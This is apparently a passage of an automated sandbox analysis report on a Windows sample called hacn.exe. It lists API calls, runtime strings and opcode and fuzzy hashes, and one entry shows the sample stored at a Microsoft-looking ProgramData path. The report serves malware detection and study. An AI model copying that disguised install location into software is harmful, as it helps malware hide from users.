                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                    • Instruction ID: 6c06bac17fd21a7cfa344499a62ab1790dfb6238a5b33d533b991b6a2712e83b
                                                                    • Opcode Fuzzy Hash: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                    • Instruction Fuzzy Hash: F3F06263B2A70281EB108F74E8457796760AF48779F542B39C96EC61E8EF2DF485C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                    • Instruction ID: 4f8d08ac5a4a4a1a52f1ebddba413eb4dbd7ee5d2a27be33eace35f6adabc2da
                                                                    • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                    • Instruction Fuzzy Hash: F1117737EBEA0301F7549968F54637510416F95378F042F36E5AE86AEAFE2CB941A104
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BA6F
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BA8E
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BAB6
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BAC7
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BAD8
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: b178397e9941e455d3fa8ed80ffb0c1af28058da3bfede487056c45115f89760
                                                                    • Instruction ID: 3409692c9465b7b2d9e9c10f5ecc65e2023e041cf5514c1e287a7b523d18a83b
                                                                    • Opcode Fuzzy Hash: b178397e9941e455d3fa8ed80ffb0c1af28058da3bfede487056c45115f89760
                                                                    • Instruction Fuzzy Hash: 4A11B123F2864245FA589F3695512BD29515F413B8F847B38E93DC67D6FF2DF4018200
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: 4712b96342f5867e5ae4f86c2ffffcef53fe1ffe9cc0e3bf397320bc2980f99b
                                                                    • Instruction ID: a1c9ce2b092d726eac8cffa112fcadc4d2832106f9720ffb3d48ba85286b8f8a
                                                                    • Opcode Fuzzy Hash: 4712b96342f5867e5ae4f86c2ffffcef53fe1ffe9cc0e3bf397320bc2980f99b
                                                                    • Instruction Fuzzy Hash: C4115E63E2D20745FA686F71945177E29814F46378F143F38D93ECA2D6FEAEB4025201
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: verbose
                                                                    • API String ID: 3215553584-579935070
                                                                    • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                    • Instruction ID: 1db06b57e67508a7bf805074a492edfff6c2f65ee846ad43c41bcdb5f7aee293
                                                                    • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                    • Instruction Fuzzy Hash: E691C02BA2864681F7218E25D86077D36A4AB44B5CFC46B3ADA5E873D5EE3EF4458300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                    • API String ID: 3215553584-1196891531
                                                                    • Opcode ID: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                    • Instruction ID: ca66fa64860b920a6c81002fb73def43e3d8f71ab4fcb9241692b359e895a110
                                                                    • Opcode Fuzzy Hash: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                    • Instruction Fuzzy Hash: 0281C177E2A30285F764CF25811027A66A0FB10B4CF55AA35CA8AF7295FF6DF8019741
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                    • Instruction ID: c7100b21cc60e57facff82b25f387776c4c34a1936da5ccb3a0ed7a1f16f11ea
                                                                    • Opcode Fuzzy Hash: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                    • Instruction Fuzzy Hash: 29617937A28B459AE710CF65D0803AD7BA0FB48BC8F045A25EE4D57B99EF78E055C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                    • Instruction ID: 7b1abd94a5bc4dc452948c4966c82b4a563ac4c30193216208b80930c48eecd0
                                                                    • Opcode Fuzzy Hash: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                    • Instruction Fuzzy Hash: BD51AF339382429AEB648F1591842697BA0EB54BC8F186735DB9DC7B95EF3CF4509B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ByteCharMultiWide
                                                                    • String ID: %s%s: %s$Fatal error detected
                                                                    • API String ID: 1878133881-2410924014
                                                                    • Opcode ID: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                    • Instruction ID: b486320e6541995335eee54312d016aee4e3d6170cc2f0b12ea1046be785a5b7
                                                                    • Opcode Fuzzy Hash: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                    • Instruction Fuzzy Hash: 4D314573638A8191E620EF10E4516DA6764FF847C4F405636E68D87A99EF3CF705CB40
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D003F01
                                                                      • Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
                                                                      • Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastMessageModuleName
                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                    • API String ID: 2581892565-1977442011
                                                                    • Opcode ID: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                    • Instruction ID: dbdd67ec131abdfa6aaa3a48bb0fd9dd330417e15eee8d4d7088cfc2e3fea3b4
                                                                    • Opcode Fuzzy Hash: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                    • Instruction Fuzzy Hash: 54014423B39642A1FA61EF31D8557B95261AF4CBC8F402F36D84DC6696FE2CF1448704
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                    • Instruction ID: 964f5abcede44e04b5f2354b4607dc28aadd9c367a4ac4f813e14177fa671239
                                                                    • Opcode Fuzzy Hash: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                    • Instruction Fuzzy Hash: 6BD1FF33B28B8189E711CF65D4402AC7BB1FB4579CB049636CE5DA7B99EE39E406C310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                    • String ID:
                                                                    • API String ID: 2780335769-0
                                                                    • Opcode ID: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
                                                                    • Instruction ID: 182a9e3d0aadf9794b6ccb75515fbd7e445a1b6761d2c6bbf1fc076b336f0bec
                                                                    • Opcode Fuzzy Hash: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
                                                                    • Instruction Fuzzy Hash: ED517E23A287418AF710DFB5D4943BD37B1AB48B9CF546A35DE0D8B689EF39E4448740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 1956198572-0
                                                                    • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                    • Instruction ID: b36e167ba6ddf2bbf17699c4949910cd3b67325db2765b7b6be17bd78edb809e
                                                                    • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                    • Instruction Fuzzy Hash: 1C11E922E3814242F754CF7AF5442791695EF88BC4F44A630EA498AB8EED3CF5C14600
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                    • Instruction ID: 4dd79f9f95e4d787ceba1d8cc188b7b9648faddd5880f007582726674cb1a425
                                                                    • Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                    • Instruction Fuzzy Hash: 14111C26B25B0589EB00DF60E8542AD33A4FB19758F441F35DA6D867A8EF78E1988380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                    • String ID: ?
                                                                    • API String ID: 1286766494-1684325040
                                                                    • Opcode ID: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
                                                                    • Instruction ID: b7e7503e7ef2b596e7317c2f83525154407780bebb208f0d24aa79c561b9df15
                                                                    • Opcode Fuzzy Hash: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
                                                                    • Instruction Fuzzy Hash: DB412727A2939242FB24CF25A40537A5A60EB907ACF545735EF9C86AD5FE3DF4418700
                                                                    APIs
                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0196D6
                                                                      • Part of subcall function 00007FF67D01B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
                                                                      • Part of subcall function 00007FF67D01B00C: GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C
                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF67D00C0E5), ref: 00007FF67D0196F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
                                                                    • String ID: C:\ProgramData\Microsoft\hacn.exe
                                                                    • API String ID: 3976345311-1917537409
                                                                    • Opcode ID: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
                                                                    • Instruction ID: 25180a2d309eff66018d37e1cc02d46cef73ac54b7a0bfb4d071c5bce6a72b36
                                                                    • Opcode Fuzzy Hash: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
                                                                    • Instruction Fuzzy Hash: 3A41B337A287128AEB14DF21A4410BC37A5EF457D8B546A35EA5E83B85EF3EF4818300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                    • Instruction ID: 6d1ff4e4667c078b5a4de81472af3b5e4bd6e961215b57e607913b51d426d32c
                                                                    • Opcode Fuzzy Hash: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                    • Instruction Fuzzy Hash: 20419F33A29A5192EB20DF25E4443ADA760FB88794F845631EA4DC7798EF3DF441C750
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID: :
                                                                    • API String ID: 1611563598-336475711
                                                                    • Opcode ID: 884843f61a913e511492ae59f2e8ac08e6ee45aa1f2a5b6daf929ec9177656e2
                                                                    • Instruction ID: 4bff40c85fba1f1518f1c093fe7f283a5e388adf2179f9e27b7fbcf2d62503b2
                                                                    • Opcode Fuzzy Hash: 884843f61a913e511492ae59f2e8ac08e6ee45aa1f2a5b6daf929ec9177656e2
                                                                    • Instruction Fuzzy Hash: 5B21F063A2868185EB209F11D0442AE77B1FBC8B88F855A35DB8D83684EF7DF949C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
